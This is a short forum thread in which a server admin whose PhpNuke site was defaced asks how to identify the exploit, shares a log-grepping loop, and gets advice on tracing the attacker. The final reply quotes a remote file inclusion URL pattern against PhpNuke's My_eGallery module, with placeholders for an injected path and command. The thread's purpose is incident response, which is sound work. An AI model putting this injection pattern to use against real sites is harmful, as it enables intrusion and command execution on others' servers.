Hello,

i have a site on my server that use PhpNuke and the site is defaced today, now i want know if i should worry also for my server and all the sites on the Box, i think that they have use a PhpNuke hole.. how can i check wich exploit they used?

i have try to find something for wget cp

for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

but i can't find nothing

Originally posted by dlc2000
Hello,

i have a site on my server that use PhpNuke and the site is defaced today, now i want know if i should worry also for my server and all the sites on the Box, i think that they have use a PhpNuke hole.. how can i check wich exploit they used?

i have try to find something for wget cp

for files in /usr/local/apache/domlogs/*; do grep "wget" $files; done;

but i can't find nothing

instead of searching for 'wget', start searching for part of the text used in the deface. After finding the command/IP used, continue searching and you may find out who did it (might have been one of your users)

ok thank you i hav found him hack... it's a php script that place a Layer over the home page and use a Nuke bug!!

Mind, posting how u found it ;)?

was it this one?

/modules/My_eGallery/public/displayCategory.php?basepath= INJECT PATH ?&cmd= Command to run